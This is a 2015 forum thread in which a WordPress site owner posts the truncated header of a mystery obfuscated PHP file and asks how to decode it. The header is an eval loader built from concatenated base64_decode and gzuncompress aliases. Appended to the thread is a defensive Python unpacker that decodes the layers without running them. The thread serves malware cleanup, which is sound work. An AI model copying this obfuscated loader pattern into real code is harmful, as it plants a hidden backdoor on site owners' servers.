mystery php file question

MisterG Member
edited November 2015 in Help

I have come across a mystery php file in one of my WordPress sites. The whole file is code. What can I use to convert it so I can see what it is doing? Prefer something in Linux but I can use Windows too.

This is just a snip of the code so you can tell what I am talking about.


Comments

  • pastebin.com all the contents.

  • timnboys Member
    edited November 2015

    Well, is it ionCube encoded? Or just base64 encoded? Basically, could you show the header of the file?

  • MisterG Member
    edited November 2015

    @timnboys Looks like base64 and it is uncompressing something.

    ```php
    <?php $wpconfig = "b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";
    $wordpress1 = "g" . "z" . "u" . "n" . "c" . "o" . "m" . "p" . "r" . "e" . "s" . "s";eval/test*
    /(/
    test*/$wordpress1/test*/(/test*/$wpconfig('eNq9fflTU0nX8L/yTNXUDHwE3qyQjB/
    ```

  • timnboys Member
    edited November 2015

    Okay, just pastebin the contents, as I can easily decode the base64 for you.
    Also, it looks like a half-baked obfuscation system someone used. Either give me the contents in PM or whatever and I will decode it for you and get the base code back,
    as they use base64 + gzip deflate a lot, thinking it really obfuscates the code when it doesn't and can easily be decoded back by people like me who know its structure, etc.

  • @timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.

  • And that was the time someone on LET was tricked into cracking badly obfuscated proprietary code.

  • @Aga said:

    And that was the time someone on LET was tricked into cracking badly obfuscated proprietary code.

    lol

  • timnboys Member
    edited November 2015

    @MisterG said:
    timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.

    Redacted

  • Considering that's just a badly obfuscated hack, I still like my version of the story better :P

  • Aga said: And that was the time someone on LET was tricked into cracking badly obfuscated proprietary code.

    Anyone that can "crack" (rather: reverse) it has an idea what it does then also - I doubt they'd just send back the unencoded file if they notice it is WHMCS core licensing file or whatever.

  • William said: I doubt they'd just send back the unencoded file if they notice it is WHMCS core licensing file or whatever.

    I agree with you, maybe it was not very clear but my comment was meant to be a joke.

  • @Aga said:

    Really? Because your comments come off as mean, sorry, but that is how it appears to me.
    And if it was a joke but didn't sound like one, at least put something like "it was a joke" or something so people don't think you're being serious (as proprietary code is very important and I don't want to let anyone cheat the dev/author of something from their well deserved hard earned cash.)

  • @timnboys Thank you for your help I really appreciate it.
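
On the question asked in the thread about decoding a file like this yourself: the following static unpacker is an added example, not code from any poster here, and it treats the PHP as data and never evaluates it. The sample input is constructed and harmless; its `/*test*/` filler comments and all helper names are assumptions.

```python
import base64
import re
import zlib

CONCAT = re.compile(r'\$(\w+)\s*=\s*((?:"[^"]*"\s*\.\s*)*"[^"]*")\s*;')
BLOB = re.compile(r"""['"]([A-Za-z0-9+/=\s]{16,})['"]""")  # packed payload
COMMENT = re.compile(r"/\*.*?\*/", re.S)  # filler comments between tokens

def resolve_aliases(src):
    """Map each variable built as "b" . "a" . "s" ... to the string it spells."""
    return {name: "".join(re.findall(r'"([^"]*)"', expr))
            for name, expr in CONCAT.findall(src)}

def inflate(data):
    """Undo gzuncompress (zlib), gzinflate (raw deflate) or gzdecode (gzip)."""
    for wbits in (zlib.MAX_WBITS, -zlib.MAX_WBITS, zlib.MAX_WBITS | 16):
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    return data  # payload was not compressed

def unpack(src, max_layers=10):
    """Peel base64+compression layers as data; the PHP is never executed."""
    layers = []
    for _ in range(max_layers):
        src = COMMENT.sub("", src)
        calls = " ".join([src, *resolve_aliases(src).values()])
        blobs = BLOB.findall(src)
        if not blobs or "base64_decode" not in calls:
            break  # nothing left that decodes a payload
        try:
            raw = base64.b64decode(max(blobs, key=len))
        except ValueError:  # truncated or damaged payload
            break
        src = inflate(raw).decode("utf-8", "replace")
        layers.append(src)
    return layers

def make_sample():  # constructed, harmless input shaped like the posted header
    spell = lambda s: " . ".join(f'"{c}"' for c in s)
    inner = "<?php echo 'constructed harmless payload'; ?>"
    blob = base64.b64encode(zlib.compress(inner.encode(), 9)).decode()
    return (f"<?php $wpconfig = {spell('base64_decode')};\n"
            f"$wordpress1 = {spell('gzuncompress')};\n"
            f"eval/*test*/($wordpress1/*test*/($wpconfig('{blob}')));")

if __name__ == "__main__":
    print("\n--- next layer ---\n".join(unpack(make_sample())))
```

A payload that starts with `eN`, like the one in the posted header, base64-decodes to the bytes 0x78 0xDA, which is the zlib header that `gzuncompress` expects. Each returned layer is plain text to read in an editor; nothing from the suspect file is run.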
